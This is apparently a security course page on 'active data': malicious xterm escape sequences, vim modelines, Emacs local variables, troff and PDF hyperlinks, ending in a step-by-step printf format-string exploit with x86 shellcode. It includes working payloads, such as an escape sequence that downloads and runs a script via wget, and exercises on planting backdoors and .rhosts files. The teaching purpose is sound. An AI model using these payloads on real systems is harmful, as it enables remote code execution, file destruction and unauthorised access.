One is inclined to think about data processing as having programs, the active parts, and data, the passive parts. Then it comes as a surprise that one can be attacked by data.
The first time I created active data was in 1974 on a PDP-8 under OS/8. The command GET should read a binary tape or file, but not execute it. The command RUN would execute it. However, a suitably crafted paper tape would take over control of the machine when read using the GET command. This was done by taking advantage of an off-by-one error in the loader.
Text sent to a terminal is displayed there. Most terminals recognize command sequences embedded in the text. Common sequences indicate bold, or blinking, or underline, or half bright, and more recently also color. Other sequences ask for erase line, scroll up, etc. On the VT100 such special sequences mostly start with the ESC symbol, and hence they are known as "escape sequences".
But the traffic is bidirectional - one can ask a terminal for its model number or serial number, for a status, for the position of the cursor, for the contents of the current line, for the screen contents.
That is interesting. Send someone a letter with some embedded sequences. If she views it on her terminal, the sequences may activate terminal functions. Text sent back by the terminal itself is indistinguishable from commands typed by the user.
For example, on vt100 terminals the character 0232 or the combination ESC Z sends back the terminal ID, 1;2c on my xterm.
Programs like xterm often have powerful features. Old versions of xterm accept escape sequences that specify a log file, and ask to start logging to that file. But that means that anybody who manages to get his text printed on such a terminal can destroy a file of his choice - maybe even give it a chosen content. Current versions have this feature switched off by default. But so many features remain.
People usually set mesg n to inhibit writes to their terminal. Programs like write and talk must filter out escape sequences.
There used to be all kinds of fun with terminals. For example, stty speed 0 < /dev/ttyN would set the baud rate of a given terminal to zero and log the user off.
Even when there is no security breach, funny sequences can cause
a loss of time. One can iconify the window, change its size,
lock (part of) it, change character set, make foreground and
background colors equal, and do lots of other annoying things,
so that it may take a non-expert a considerable amount of time
to get back to normal.
There may also be privacy concerns. On an xterm, the 3-symbol sequence ESC [ i sends the screen to the printer.
Exercise
Play with xterm. What do the sequences ESC [ 2 t and ESC [ 3 ; 100 ; 0 t and ESC [ 4 ; 1 ; 1 t and ESC [ 2 1 t and ESC ] 2 ; h a c k e d BEL do? (Test by typing to cat or ed or so, or use echo, for example echo -e "\e]2;hacked\a".)
As a combination of the last two parts of this exercise, look at
    echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
The command to fetch a file with commands from some place on the net and execute it is stored in the window title bar. Then the window title bar is reported, and executed as soon as the user hits enter.
Exercise
(H D Moore) What does echo -e "\eP0;0|0A/17\x9c" do?
Exercise
Construct a filename so that echoing its name to an xterm window colours the background red.
Exercise
Construct a filename so that echoing its name to an xterm window removes the line containing that name. A good name to use if one knows that the name of a program will be echoed in an error message to the console screen.
Exercise
Design a short text file called README so that after the command cat README the xterm window does not show anything suspicious, but after the next command the machine is hacked (let us say, a file .rhosts is created that allows access to anyone).
The Unix editor ex (with "visual" variant vi) would accept the sequences ex:, ei:, vx: and vi: occurring in the first or last five lines of the file being edited, and interpret the rest of the line as a startup command. (Still in 4.2 BSD.) Later this behaviour was made conditional upon a variable modeline or modelines. This is still the situation on many systems that have some vi-clone.
One could do funny things, like setting the shell and tags programs to be used, so that the system would be compromised as soon as a shell escape was used. On other systems it was even easier, and commands could be invoked directly from the modeline via a shell escape. (Here a discussion from 2001.)
Recent systems either disable modelines, or enable them but disallow the most dangerous uses. Nevertheless similar bugs keep coming up - allowing embedded scripts in files is inherently unsafe.
Georgi Guninski gave the example (Dec 2002)
    /* vim:set foldmethod=expr: */
    /* vim:set foldexpr=confirm(libcall("/lib/libc.so.6","system","/bin/ls"),"ms_sux"): */
    vim better than windoze
that later was upgraded to a worm. On my system the version
    vim: foldmethod=expr
    vim: foldexpr=libcall("/lib/libc.so.6","system","/bin/ls\ -l")
    vim better than windoze
works better (and shows how to use commands with parameters).
Exercise Find whether this works in your vi, possibly after changing the settings for modeline or modelines. Construct a letter such that if the vi-using receiver replies to it a backdoor is left on his system.
In Dec 2004 the following was discovered:
    % cat .vimrc
    set modeline
    filetype plugin on
    % cat evil.vim
    let a = system('echo "I was here" > /tmp/owned')
    % cat test
    onzin
    vim: ft=../../../../../home/aeb/evil
    % cat /tmp/owned
    cat: /tmp/owned: No such file or directory
    % vim test
    % cat /tmp/owned
    I was here
Clearly, any cautious user has set nomodeline in his .vimrc.
Note that in many contexts people have tried to restrict the use of files to "local" ones, forbidding absolute pathnames. Often such a restriction can be circumvented using ../ in the name.
In a completely similar way, many files contain embedded strings intended to set emacs options. For example, many man page source files start out
    .\" Hey Emacs! This file is -*- nroff -*- source.
Here the part between -*-'s defines the major mode, and can also contain variable settings. There can also be a Local Variables: part at the end of a file. For example, in the Linux kernel many files in the SCSI code part end with
    /*
     * Overrides for Emacs so that we follow Linus's tabbing style.
     * Emacs will notice this stuff at the end of the file and automatically
     * adjust the settings for this buffer only. This must remain at the end
     * of the file.
     * ---------------------------------------------------------------------------
     * Local variables:
     * c-indent-level: 4
     * c-brace-imaginary-offset: 0
     * c-brace-offset: -4
     * c-argdecl-indent: 4
     * c-label-offset: -4
     * c-continued-statement-offset: 4
     * c-continued-brace-offset: 0
     * indent-tabs-mode: nil
     * tab-width: 8
     * End:
     */
This feature can (and should!) be disabled, but enable-local-variables is often t by default. Set it to nil. Sometimes one has to use inhibit-local-variables. Set it to t.
Sometimes there is an additional variable enable-local-eval
that enables the more dangerous actions in a Local variables section.
Charles Howes gave the example
So there you are, reading along in some file that you found. Just browsing away, when what happens, but some magic bit of
    Local variables:
    find-file-hooks: ((lambda () (unwind-protect (save-excursion (goto-char 0) (re-search-forward "^Local variables:$") (beginning-of-line) (let ((p (point))) (re-search-forward "^End:$") (let ((m (buffer-modified-p))) (delete-region p (1+ (point))) (setq p (point)) (insert "-- hi there, I'm toast. -- ") (insert (or (buffer-file-name) "nil")) (call-process-region p (point) "/bin/echo" t 0 nil "you" "are" "toast") (set-buffer-modified-p m) ))) (kill-local-variable 'find-file-hooks))))
    End:
text buried in that buffer comes to life and runs an arbitrary piece of code at you. Have a nice day!
(This works here. The known attacks in this style were fixed in emacs 21.3.)
Exercise Find whether this works in your emacs, possibly after changing the settings for enable-local-eval, enable-local-variables, inhibit-local-variables.
Very similar things hold for the Microsoft world, where macro viruses have been seen since 1995. An MS Word or Excel document can have a macro section with Word.Basic commands. Arbitrary actions can be caused by just opening the document. Some ancient links: an early advisory, an early FAQ, Virus Encyclopedia, Macro Virus writing Tutorial Part 1, Part 2.
Formatters use a formatting language. Sometimes this language allows one to invoke arbitrary commands.
Runoff was a text formatter. Unix had the typesetter version troff and the non-typesetter version nroff. GNU has groff. These days TeX has taken over (mostly because troff is proprietary I suppose - for myself I prefer troff), but troff is still widely used as man page formatter. Various versions have commands that will invoke arbitrary system programs (e.g. .sy cmd or .pso cmd). Thus, it may be dangerous to view man pages obtained from an unreliable source.
On my current Linux system I see
    % cat foo.1
    .sy date
    .pso ls
    % man ./foo.1
    <standard input>:2: .sy request not allowed in safer mode
    <standard input>:3: .pso request not allowed in safer mode
    % troff -U foo.1
    Tue Apr 1 11:00:05 CEST 2003
    x T ps
    x res 72000 1 1
    x init
    ...
That is, one has to ask for "unsafer" mode for these macros to take effect.
A similar story. Postscript "pictures" are really programs. In case such programs can execute arbitrary system commands, it is dangerous to look at Postscript files from untrusted sources. If your browser can display Postscript, then you lose as soon as you click on a link to a page that contains an evil picture.
And even if the viewer tries to restrict dangerous commands, it can be hit by a buffer overflow or syntax error. There is a long list of advisories concerning the handling of PostScript and PDF, the latest one today.
One can also insert bad strings into a PDF file, that cause a viewer like xpdf to emit an error message containing that bad string. If the viewer was invoked on an xterm then tricks discussed above apply: one can hit xterm with arbitrary escape sequences.
PDF files can also contain suitably constructed hyperlinks that can cause arbitrary code to be run when activated by the reader.
Let us look at some detail. First, what precisely does xpdf (my PDF viewer) do when one clicks a hyperlink? Maybe it calls a browser - the details depend on user settings. Some config file, like /etc/xpdfrc or .xpdfrc, can contain a line like
    urlCommand "netscape -remote 'openURL(%s)'"
telling what to do with this hyperlink. If there is no such line we get a message URI: ... on the xterm where we invoked xpdf.
Exercise Construct a PDF file with a hyperlink such that clicking that link (when urlCommand is not set) will set the xterm title bar to "-hacked-" and move the xterm window to some other place on the screen.
But things are more interesting when there is a urlCommand. It will be invoked as system(CMD &), that is, as sh -c 'CMD &'. (More precisely, single and double quotes in CMD will be replaced by %27 and %22, otherwise CMD is copied faithfully. The latest RedHat security fix also replaces back quotes by %60.)
A urlCommand like the default one shown above (with the %s part enclosed in single quotes) is fairly safe. But many distributions have an unprotected %s. For example, RedHat 8.0 uses
    urlCommand "/usr/bin/xpdf-handle-url %s"
Make a LaTeX file with a hyperlink:
    \documentclass[11pt]{minimal}
    \usepackage{color}
    \usepackage[urlcolor=blue,colorlinks=true,pdfpagemode=none]{hyperref}
    \begin{document}
    \href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\texttt{Click me}}
    \end{document}
and invoke pdflatex to make a PDF file. Now look at it with xpdf, and click the link. The file /tmp/abc is removed and /tmp/pqr is created. (If there is a popup window telling that /usr/bin/xpdf-handle-url should be edited to teach it about the protocol prot:, hit enter in that window.) One can follow what happens using
    strace -f -e execve xpdf test.pdf
or so. The
    sh -c '/usr/bin/xpdf-handle-url prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr'
invokes rm via the backquote construction, and touch since ; is a command separator.
We see that a security fix that removes backquotes does not suffice. The right fix is to write
    urlCommand "/usr/bin/xpdf-handle-url '%s'"
and to have an xpdf-handle-url that never exposes its $1 like the RedHat 8.0 version does in another sh -c.
Conclusion of this discussion: one can easily produce PDF files such that when these are viewed by xpdf on a current machine arbitrary commands are executed (with the permissions of the reader). I have not tried Acroread, but it is said that the same things hold there.
Exercise Construct a PDF file with a hyperlink such that clicking that link on a RedHat 8.0 system will create a .rhosts file with appropriate contents in the reader's home directory.
More a method than an example comes with the routine printf(). The ordinary use is for formatted printing, as in printf("val=%d\n",val) or printf("Hello, world!\n"). The argument string is printed, except that some combinations involving % have a special meaning. The example printf("Hello, world!\n") inspires people to write printf(s) where s is some string. But that has interesting effects when the user can influence the string that is printed, making sure that it contains active data.
Let us write the program echo.c.
    #include <stdio.h>

    int main(int argc, char **argv) {
        int i;

        for (i = 1; i < argc; i++) {
            if (i > 1)
                printf(" ");
            printf(argv[i]);
        }
        printf("\n");
        return 0;
    }
Seems straightforward, and it works. Or, does it?
    % ./echo Goodbye SCO!
    Goodbye SCO!
    % ./echo Ach %d %s
    Ach -1073744428 h÷ÿ¿o÷ÿ¿s÷ÿ¿v÷ÿ¿
    % ./echo "%08x %08x %08x %08x %08x"
    bffff5d4 bffff588 4015afd8 40018420 00000001
    % ./echo "%s %s %s %s %s"
    Segmentation fault
If the string contains a percent-something combination then the required argument is fetched from the stack, and we print garbage or crash. We understand the crash: the address 00000001 is used to print a string from, but there is nothing there.
Let us try to understand the garbage. When printf() prints the string, the stack has the local variables of printf(), the saved frame pointer, the return address, and the parameters of printf() - in this case the format string. Try to get at the format string by using a longer format string. Typing lots of %08x gets boring. Use perl to do that for us. (For perl, . is concatenation, and x repeats the preceding string the indicated number of times. For example, "%08x %08x %08x %08x " can be written as "%08x "x4.)
    % FMT=`perl -e 'print ((("%08x "x8)."\n")x6)'`; ./echo "$FMT"
    bffff4f4 bffff4a8 4015afd8 40018420 00000001 bffff4c8 40040d17 00000002
    bffff4f4 bffff500 40018ba0 00000002 08048280 00000000 080482a1 0804833c
    00000002 bffff4f4 080483b0 08048410 4000d930 bffff4ec 00000000 00000002
    bffff67c bffff683 00000000 bffff779 bffff792 bffff7e7 bffff7f7 bffff829
    bffff838 bffff85f bffff86a bffff875 bffff885 bffff896 bffff8a4 bffff8c0
    bffff8d2 bffff8e5 bffff900 bffff909 bffffbca bffffbe3 bffffc03 bffffc11
    %
The stack grows downward from 0xc0000000. Pointers to the stack therefore tend to look like 0xbfff.... and all those pointers to the stack at the end of the above list are environment pointers:
    % FMT=`perl -e 'print (((("%08x "x8)."\n")x3).("%08x "x3)."%s\n"x2)'`; ./echo "$FMT"
    bffff554 bffff508 4015afd8 40018420 00000001 bffff528 40040d17 00000002
    bffff554 bffff560 40018ba0 00000002 08048280 00000000 080482a1 0804833c
    00000002 bffff554 080483b0 08048410 4000d930 bffff54c 00000000 00000002
    bffff6e2 bffff6e9 00000000 LESSKEY=/etc/lesskey.bin
    MANPATH=/usr/local/man:/usr/share/man:/usr/X11R6/man:...
    %
Below the environment pointers we see argc (2) and the list of (the two) arguments of the ./echo "$FMT" invocation, terminated by NULL.
    % FMT=`perl -e 'print (((("%08x "x8)."\n")x3)."%s\n"x2)'`; ./echo "$FMT"
    bffff564 bffff518 4015afd8 40018420 00000001 bffff538 40040d17 00000002
    bffff564 bffff570 40018ba0 00000002 08048280 00000000 080482a1 0804833c
    00000002 bffff564 080483b0 08048410 4000d930 bffff55c 00000000 00000002
    ./echo
    %08x %08x %08x %08x %08x %08x %08x %08x
    %08x %08x %08x %08x %08x %08x %08x %08x
    %08x %08x %08x %08x %08x %08x %08x %08x
    %s
    %s
    %
Yes, precisely as expected. We can find the format string on the stack, with the closing NUL byte at address 0xbffff778 and a starting address that depends on its length. (Above the starting address was bffff6e9 with a string of length 143.)
The program itself lives around 08048000:
    % nm ./echo | grep -w main
    0804833c T main
so numbers like 08048280, 080482a1, 0804833c, 080483b0, 08048410 are probably program addresses.
Can such a printf format flaw be exploited? Read the printf(3) manual page. We encounter %n:
    n      The number of characters written so far is stored into the integer indicated by the int * pointer argument.
Interesting. One can write to a given address. The value written to that address is the number of bytes printed so far. We have easy control over that. Can put lots of padding in the format string, or, easier, use formats like %73x to print numbers with any predetermined amount of padding. So, any (not too large) number above some lower bound can be written via %n. Remains to get control over the address written to.
First read a bit more in printf(3). It says
    By default, the arguments are used in the order given, where each `*' and each conversion specifier asks for the next argument. One can also specify explicitly which argument is taken, by writing `%m$' instead of `%' and `*m$' instead of `*', where the decimal integer m denotes the position in the argument list.
(There is more text there, and we'll violate the rules, but it works.)
That simplifies matters. We can use this in the format to jump immediately to the desired place. As a test, let us find program name and format again on the stack.
    % ./echo '%25$s %26$s'
    ./echo %25$s %26$s
As expected. Now overwrite the program name with an exclamation mark.
    % ./echo '%25$33s%25$n %25$s'
                               ./echo !
Look what happened. First we print the program name padded with spaces, in a field of width 33. Then write the number of symbols written so far (that is, 33, the ASCII code for !) to the place where the program name was found earlier. Four bytes are written, in little-endian order, 0x21, 0, 0, 0, and the first two of these form the string "!" that is printed now.
So it works. We can overwrite memory with a given value. But the address written to was found only because there happened to be a pointer to it on the stack. In order to write to arbitrary addresses we must have arbitrary pointers on the stack, and can create them since the format string is found on the stack.
Where is this format string? Dump a larger fraction of the stack.
    % FMT=`perl -e 'print ((("%08x "x8)."\n")x16)'`; ./echo "$FMT"
    bffff354 bffff308 4015afd8 40018420 00000001 bffff328 40040d17 00000002
    bffff354 bffff360 40018ba0 00000002 08048280 00000000 080482a1 0804833c
    00000002 bffff354 080483b0 08048410 4000d930 bffff34c 00000000 00000002
    bffff4e2 bffff4e9 00000000 bffff779 bffff792 bffff7e7 bffff7f7 bffff829
    bffff838 bffff85f bffff86a bffff875 bffff885 bffff896 bffff8a4 bffff8c0
    bffff8d2 bffff8e5 bffff900 bffff909 bffffbca bffffbe3 bffffc03 bffffc11
    bffffc1c bffffc2a bffffc3e bffffc51 bffffcff bffffd08 bffffd2a bffffd3f
    bffffd53 bffffd6f bffffd7a bffffde8 bffffdf0 bffffdff bffffe1d bffffe2a
    bffffe49 bffffe5c bffffe81 bffffea2 bffffead bffffec6 bffffed2 bffffede
    bfffff07 bfffff1f bfffff45 bfffff78 bfffff85 bfffffa2 bfffffb7 bfffffcf
    bfffffdb bfffffec 00000000 00000020 ffffe400 00000021 ffffe000 00000010
    0183f9ff 00000006 00001000 00000011 00000064 00000003 08048034 00000004
    00000020 00000005 00000006 00000007 40000000 00000008 00000000 00000009
    08048280 0000000b 000001f4 0000000c 000001f4 0000000d 00000064 0000000e
    00000064 00000017 00000000 0000000f bffff4dd 00000000 00000000 00000000
    00000000 00000000 38366900 2f2e0036 6f686365 38302500 30252078 25207838
    %
Yes. The format repeats the bytes of "%08x " (with trailing space), that is, 0x25, 0x30, 0x38, 0x78, 0x20, starting from 0xbffff4e9, closing NUL at 0xbffff778. Here argument 126 is 0x38302500, that is, the closing NUL of the program name, and the first three bytes of the format. And argument 127 is 0x30252078, the next four bytes of the format.
Life is simpler when the format string starts at an address divisible by 4, so in this example we must give it a length that is 0 (mod 4). (Note that the sh backquote construction trims trailing newlines, so that the format in this last example has length 655.) For example,
    % ./echo 'AAAABB %124$08x %125$08x'
    AAAABB 41414141 25204242
Here the string has length 24, divisible by 4, and 124 words from top-of-stack the AAAA is seen. This number 124 varies a little with the length of the format string (mod 16) due to alignment effects. Let us only work with formats of a length divisible by 16, then the format starts at word 126:
    % ./echo 'ABCDXXX %126$08x'
    ABCDXXX 44434241
Try to overwrite the program name with "Hoi!". That is, we want bytes 0x48, 0x6f, 0x69, 0x21, 0 (decimal 72, 111, 105, 33, 0) at some address like 0xbffff4e2. Using %n we can write four bytes, but the value written is the number of bytes output so far, and 0x21696f48 is too large, so it must be written one byte at a time. Do four writes, to increasing addresses. Each write creates the byte we want but also overwrites the next three bytes with the higher-order bytes of the count, mostly NULs.
If we make a format string of length 64, then it will start at 0xbffff738, and the program name will start at 0xbffff731.
    % FMT=`perl -e 'print "\x31\xf7\xff\xbf\x32\xf7\xff\xbf\x33\xf7\xff\xbf\x34\xf7\xff\xbf%56d%126\x24n%39d%127\x24n%250d%128\x24n%184d%129\x24n\x0a%25\x24s"'`
    % ./echo "$FMT"
    1÷ÿ¿2÷ÿ¿3÷ÿ¿4÷ÿ¿ -1073744476 -1073744552 1075163096 1073841184
    Hoi!
    %
Explanation: the part \x31\xf7\xff\xbf stores 4 bytes that together form the address 0xbffff731. Then \x32\xf7\xff\xbf forms 0xbffff732. Etc. Four addresses start the format string, ready to be accessed via %126$n, %127$n, etc. Here the dollar sign is coded as \x24 to prevent perl from interpolating $n as a variable inside the double-quoted string (the shell leaves it alone inside single quotes). In order to write the desired values via these %n pointers, we have to print some bytes. That is the purpose of the %56d etc. parts of the format. Finally, the %25$s prints the program name, verifying that we succeeded in writing "Hoi!" there. The \x0a is a newline, making sure that "Hoi!" appears on a new line after the garbage line.
This means that we have complete control over the program. We can make it exec a shell and get remote access if this was a remote program, or get root access if this was a setuid root program.
Very small field widths will fail: printing 666 with format %2d takes 3 positions, not 2. The worst case with a decimal signed format may be -2147483648 which takes 11 positions. So, one should use %258d instead of %2d (etc.) so as to avoid this problem. Or one can use %2c instead, where that is supported.
For an exploit it suffices to overwrite a single memory location with a single value. The memory location will be one that holds a return address, or the address of a function that is going to be called. The single value will be the address of a function that we would like to call instead.
A concrete setup can be the following:
1. Put shellcode in the environment:
    % SHELLCODE=`perl -e 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
    % export SHELLCODE
(This modifies the environment, and changes all addresses found above, so should have been done at the start.)
1a. Find the address of the shellcode. Maybe with a tiny program like
    #include <stdio.h>
    #include <stdlib.h>

    int main(int ac, char **av) {
        while (--ac > 0) {
            char *p = getenv(*++av);
            printf("%p\n", p);
        }
        return 0;
    }
Give this tiny program a name of the same length as that of the program we want to exploit (increasing the length of the program name by 1 decreases the address of environment variables by 2), and ask for the address:
    % ./addr SHELLCODE
    0xbffff837
2. Find the address of the destructor table of the program.
    % nm ./echo | grep DTOR
    08049580 d __DTOR_END__
    0804957c d __DTOR_LIST__
Now write the address of the shellcode, that is, 0xbffff837 to the address 0x08049580. When the program exits, its destructors will be called and our shellcode is executed.
Some security-conscious programs remove all environment variables except perhaps for a few known ones. If one cannot store a string in the environment, the string can be one of the program parameters. If the program does not allow that, one can create a link to the program so that the exploit string becomes the name of the program.
Maybe the first exploit of this type was the wu-ftpd exploit (published June 2000, one of the exploits given there is dated 15-10-1999). Study the code!
When people started looking for such vulnerabilities, these were found all over the place. An xlock exploit. An rpc.statd exploit. An LPRng exploit. These were root exploits. Here a PHP exploit that gives one the rights of the invoker, probably httpd.
Many variations on this theme are discussed on the web. A good reference to these exploits is this 2001 writeup. See also the notes by Frédéric Raynal and Kalou.